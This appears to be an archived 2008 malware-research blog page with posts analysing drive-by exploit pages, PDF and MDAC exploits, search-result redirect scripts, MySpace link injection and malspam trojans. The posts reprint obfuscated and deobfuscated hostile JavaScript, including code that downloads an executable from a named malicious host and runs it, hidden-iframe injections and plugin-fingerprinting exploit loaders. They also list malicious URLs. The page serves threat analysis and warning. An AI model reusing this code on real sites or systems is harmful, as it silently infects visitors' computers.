Archive for the 'Vulnerabilities' Category

13
Oct

Internet Exploitation Adventure

By djpnuemo Comments
Categories: Database Update, IFRAME, Investigated, Rogue, Rogue Anti-Malware, Rogue Software and Vulnerabilities

This post shows the lengths people will go to in order install malware onto computers. We will show how visiting one website will take you on a journey to many websites that will check your computer for vulnerable software and if found, will install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org will start this process. Then hidden iframes are loaded with websites scanning your computer for vulnerabilities and if it can’t, redirect you somewhere else. These websites are still active so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchored links further down the page to view the analysis easier. The links just below are listed in the approximate order in which they load would while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

Picture below shows visual map of how pages are loaded.

Continue reading ‘Internet Exploitation Adventure’

05
Oct

Multiple Exploit Page (Acrobat, Outlook Express, & Quicktime)-VIDEO

By djpnuemo Comments
Categories: Database Update, Malicious Domains, Malicious Links, Malware and Vulnerabilities

Here is another example of an exploit page. This exploit searches for a vilnerability and then injects the malware to the computer. In this case, there are multiple files in use here. All the files are listed below with details. As with previous posts, we captured video of the exploit in action.  The files are available our repository under /pnuemo-malware/1005-exploit.zip.

The first page starts the search for an vulnerability to exploit and once found, loads the binary from the next URL. It will look for vulnerabilities in Adobe Acrobat, Outlook Express, and Quicktime to name a few. The exploit page has multiple pages of obfuscated code that is too much to post. You can download the code here (.txt).

BE ADVISED: This websites may still be live. Proceed at your own risk.

hxxp://195.242.161.63/z/index.php -> hxxp://195.242.161.63/z/load.php?ssv=

doc.pdf
Result: 8/36 (22.23%)
MD5: 2b477c02cef58a4d965b149311f495f2
VirusTotal

default.exe
Result: 14/36 (38.89%)
MD5: df5fbc8fb5ab1e9a69c72508250cb451
VirusTotal
ThreatExpert Analysis

Download Video (.wmv)

04
Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

By djpnuemo Comments
Categories: Database Update, IFRAME, Malicious Links, Malware, Video and Vulnerabilities

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different than the one posted earlier and this one redirects through multiple pages logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and information about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites my be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This pages contains a simple hidden iframe that will load multiple pages logging each visitor how visits.

<iframe src=”http://megsrdomain.cn/tor/count.php?o=5″ width=1 height=1 style=”visibility: hidden”></iframe>

In the iframe we are redirected two times until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

04
Oct

MDAC Exploit Page (iexplorer.exe)

By djpnuemo Comments
Categories: Database Update, Malware Distribution and Vulnerabilities

We discovered another exploit page that will inject malware on to the users computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page in which the malware payload is injected. Below is analysis of the exploit page along with the malware information. The binary has very few real detections, most are just heuristics. This file is available in the repository under /pnuemo-malware/.

BE ADVISED: Websites may still be active, proceed at your own risk.

hxxp://gavai-pegc9.ws/Gpack/index.php

<html><head><meta HTTP-EQUIV=”REFRESH” content=”3; URL=index.php?404″><script language=
JavaScript>str = “ru`su)(: gtobuhno!ru`su)(!z w`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(: {`e/rdu
@uushctud)&he&-&{`e&(: {`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&
*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(: usx!z w`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3
&*#/#*&YL&*#MI#*&U&*&UQ&-&&(: w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#n
o#-&&(: w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(: usx!z!u/uxqd!<!0:
p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(: p/rdoe)(:!u/nqdo)(: u/Vshu
d)p/sdrqnordCnex(: w`s!o`ld!<!&/..//..hdyqmnsds/dyd&: u/R`wdUnGhmd)o`ld-3(: u/Bmnrd)(: |!b`ub
i)d(!z| usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z|| b`ubi)d(z||”;str2 = “”;for (i = 0; i < str.length; i ++) { s
tr2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>

deobfuscates to:

start();
function start() {
var zad = document.createElement(’object’);
zad.setAttribute(’id’,'zad’);
zad.setAttribute(’classid’,'cl’+’si’+”d:BD”+”96C5″+’56-65A3-1′+”1D0-98″+’3A-00′+”C04″+’FC2′+”9E”+
‘36′);
try {
var q = zad.CreateObject(’ms’+”xm”+’l2′+”.”+’XM’+”LH”+’T'+’TP’,”);
var s = zad.CreateObject(”Shel”+”l.Ap”+”pl”+”icati”+”on”,”);
var t = zad.CreateObject(’ad’+'od’+”b.”+’st’+”re”+’am’,”);
try { t.type = 1;
q.open(’G'+”E”+’T',’http://gavai-pegc9.ws/Gpack/load.php’,false);
q.send(); t.open();
t.Write(q.responseBody);
var name = ‘.//..//iexplorer.exe’;
t.SaveToFile(name,2);
t.Close();
} catch(e) {}
try { s.shellexecute(name); } catch(e) {}}
catch(e){}}

hxxp://gavai-pegc9.ws/Gpack/load.php downloads the malware binary.

file.exe
Result: 9/36 (25%)
MD5: e427f1c2438259b5b4bb386aec822e30
VirusTotal
ThreatExpert Sandbox Analysis

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo Comments
Categories: Antivirus 2008, Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(’%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(’<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

26
Jul

The new wave of malware being sent by email, botnet for hire?

By jsalva Comments
Categories: Antivirus 2008, E-mail, Malicious Links, Rogue Software, Social Engineering and Vulnerabilities

My friend Lithium has been blogging about the recent wave of malware being distributed by emails. There seem to be 2 differentiated campaigns right now:

1- Emails that have links to compromised web sites (no attachments)

2- Emails that have a .zip/exe attachment

As I was working on some of our customers computers (they got infected when clicking an email from UPS, even when they never shipped anything…) I realiced how bad this actually is. The people think that they are being infected by the rogue antivirus programs (antivirus xp, antivirus 2009, 2009 antivirus, aav,… whatever they decide to promote) but the origin of the infection itself is much worst than that:

The file received on the email is actually a variant of ZTOP or Sinowal (name changes depending on AV vendor)  These trojans have self update, key logging and remote control capabilities. Once installed, they “Phone home” to download updated commands. They do this periodically.

I ran one of them at one of my virtual machines. For a few seconds, nothing happened and I was even tempted to run it again. The the trojan connected to russia (hxxp://blatundalqik.ru/panama/odessa.bin) and downloaded new instructions. Inmediatelly, my virtual machine began closing applications, and before it restarted on its own the desktop background changed to the popular “your computer is infected”.

Once the computer restarted, I got one of the variants of xp antivirus running and my real antivirus was just dead. Constant warnings where coming from the task bar.I have seen this warnings hundreds of times. They are annoying, but usually they are not dangerous. This time is different.

What actually happened is that the trojan had installed itself (ntos.exe, crypts.dll, wnspoem folder and video/audio.dll files) and after calling home it was ordered to install xp antivirus. They ordered to install xp antivirus the same way they could have ordered to silently monitor the user browsing and capture any bank or credit card information. Tomorrow they may decide that they need spamming computers, or to do a DOS on a company… all they have to do is change the configuration file. All the infected zombies will follow orders!

Once ntos.exe and crypts.dll installs in a computer, the computer no longer belongs to the user. Using root kit technologies, the file will hide itself from the user, and only advanced rootkit detectors will be able to reveal the real problem. The trojan also runs from a temporary file on the temp folder, while crypts.dll monitors that the required registry entries to load it on restart are still present. The computer is now part of a botnet, another zombie to be used as needed.

About the xp antivirus infection? It’s anoying, you may have to fix a few registry entries to gain full desktop functionality but unless you go and buy their thing, they are more or less harmless (at least from a tech point of view, I’m sure the user will see that being worst than having a silent trojan)

Only the people controlling the hxxp://blatundalqik.ru server will know the actual extend of the infection. Besides the pop-ups and attempts to get your credit card information, the trojan could be recording your every key stroke, logging your visits to pay your bills, even taking screen shots of your applications; while all your confidential information is conveniently backed up in a server in Russia, should it ever be needed by some one (other than you)

The overload of xp antivirus and similar calls to the antivirus companies has also the effect of saturating their resources, having to dedicate more and more time to manual removal of infections, to keep the customer happy, while the real malicious codes are lurking on the background, undetected.

 

26
Jul

More malicious search engine results…

By jsalva Comments
Categories: Malicious Links, Rogue Software, Social Engineering and Vulnerabilities

This was quite interesting. One of my co-workers just learned that there is a malicious html page with his name on it! When I downloaded the page down we realized that it was not a targetted attack, but a different variant of the malicious pages I reported under my MSN malicious results post.

This server actually had 3179 other html pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages.

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj=’SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0′;}var y;var OR=”;for(var vadz=0;vadz<yry.length;vadz+=4){y=(dtj.indexOf(yry.charAt(vadz))&63)<<18|(dtj.indexOf(yry.charAt(vadz+1))&63)<<12|(dtj.indexOf(yry.charAt(vadz+2))&63)<<6|dtj.indexOf(yry.charAt(vadz+3))&63;OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe(’2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS’);

And it translates into:

window.location=encodeURI(”hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=”+encodeURIComponent(document.referrer)+”¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=XXX”);

The redirection has changed to a different server:

hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=

Right now this is directing you to antivirus2008scanner.com, one of the multiple variants of rogue antivirus on the market. scan.wspscanner.com is another possible destination.

How difficult is to get to one of those pages?

Continue reading ‘More malicious search engine results…’

24
Jul

MySpace infected pages distributing ZLOB

By jsalva Comments
Categories: Antivirus 2008, Malicious Links, Malware, Social Engineering, Uncategorized and Vulnerabilities

During the last weeks I have seen a few infected MySpace pages. Pages from regular users that get “corrupted” by malicious visitors. The malicious attacker will insert an iframe onto one of the posts on the page, turning most of the page into a huge hyperlink to a malicious site.

This is an example of the code that gets inserted:

<.a ggg= </ggg href="<hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk>" style="position:absolute; top:0px;background-repeat:no-repeat;left:0px; height:860px;width:1263px;background-image:url( <http://x.myspace.com/images/clear.gif);> background-position:left;">

Take a closer look at the link itself:

hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk

It looks just like any other myspace link but pay closer attention: There are no “/”! There should have been one after myspace.com, and before index.cfm. Without the slash, the real domain of the page is now 16658764.tk, far different from what they want the user to believe it is. A regular user will not notice the difference and if he clicks on the hot area of the page, he will end landing up here:

hxxp://myspacelogin-error900.freehostia.com/myspace.php

The MySpace user will most likelly install the “new MySpace object browser”, but instead he or she will be agreeing to install a new variant of ZLOB. This means lots of pop-ups, constant warning about the computer being infected (hey, but give us your moneys and we’ll clean it for you with our super-duper anti virus)…

There is no good way of getting out of that page. It’s either you accept the download, or you must kill your Internet Explorer. if you select cancell you’ll be put on a “cancel, you sure, ok, cancel” loop. Just use task manager and will the browser.

We have downloaded THOUSANDS of samples of ZLOB from that location, each one slightly different to make life more difficult to the AV vendors.

Be careful. Always double check your links and do not accept any “free updates” from suspicious sites.

22
Jul

Malware disguised among MSN search results…

By jsalva Comments
Categories: Malicious Links, Malware, Uncategorized and Vulnerabilities

Hi there, this is my first post on the blog and I’ll be blogging about malware pages disguised as good results on the MSN livesearch engine. On the past weeks I have detected close to one thousand infected servers, each one of them hosting over 2000 bad HTML pages, currently being returned to the users via MSN.

This is the way the infection happens: A user performs a search on MSN live search, and depending on his luck, some malicious web sites are returned. The brief description displayed from the search results page may indicate that the contents of the website could be a good match for what the user is looking for, but he will never see the page once the link is clicked…

On those malicious pages, there is some more or less random text (but the text can be somewhat targeted against certain keywords, or just stolen from real websites) But on the top of the page, an encrypted script will automatically redirect the user trhough a server in Russia that on the first visit will ask the user to install a video codec to view a video of what he was looking for.

I have identified over 1000 web sites, each with close to 3000 html pages. The variables on the script and the “keys” to decrypt it vary between sites, making detection harder. If you visit one of those sites directly (no referer) the site will respond with an apparent 404 - Not found message… but looking at the source code of the page you can easily see the full real page and script. This is a trick to make detection even harder as it’s very easy to think that the page is actually down.

Do you want to see some of them?

Continue reading ‘Malware disguised among MSN search results…’

18
Jul

Afghan bombing kills President Bush (watch.exe)

By lithium Comment
Categories: Antivirus 2008, Malware, Social Engineering and Vulnerabilities

The Washington Post reported today that President Bush has hit another all time (69%) low according to a recent poll [link].

Q. Do you approve or disapprove of the way George W. Bush is handling his job as president?

A. 28% approve; 69% disapprove

SOURCE: Washington Post-ABC News poll conducted by telephone July 10-13, 2008 among a random national sample of 1,119 adults. Results have a three point error margin.

Bush Approval Rating Poll

With that said, we stumbled across an e-mail today with the subject line “Afghan Bombing kills President Bush.”  Time after time we see social engineering used to entice unsuspecting users to infect themselves and the subject line of this e-mail is proof of that.

Here is what the e-mail looks like.  The body doesn’t really make much sense but I’m sure many will just read the subject line and click on the link despite this fact.

When we visit the site we see a copy of the YouTube SWF player and a prompt to download a file called watch.exe to see it.

If we download watch.exe and open it we see it exploiting vulnerable versions of Java.

MD5: efbd6daf5a73fa6398538f1eec1f48a2
The file has been made available to members of Malware Database.

More information about what watch.exe can be obtained here [result.zip] thanks to Joe Security!

Upon further investigation we found a massive wave of these going out today.

Take a look at some of the other e-mail titles we have seen:

Edit: New e-mail subject as of today.  “Conspiracy of 1865 Lincoln assassination exposed”


Update here: http://malwaredatabase.net/blog/index.php/2008/07/20/the-plot-thickens-watch-exe/

« Previous Entries

Malware Database Forum



Click for

Malware Removal Information



Special Deals


$20 Off Panda Internet Security 2009

 

December 2008
M T W T F S S
« Nov    
1234567
891011121314
15161718192021
22232425262728
293031  

Support Malware Database!


Security Engineering: A Guide to Building Dependable Distributed Systems

Reversing: Secrets of Reverse Engineering

Crimeware: Understanding New Attacks and Defenses (Symantec Press)

Security Power Tools

IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job

Windows Command-Line Administrator's Pocket Consultant, 2nd Edition

CompTIA Security+ Certification Kit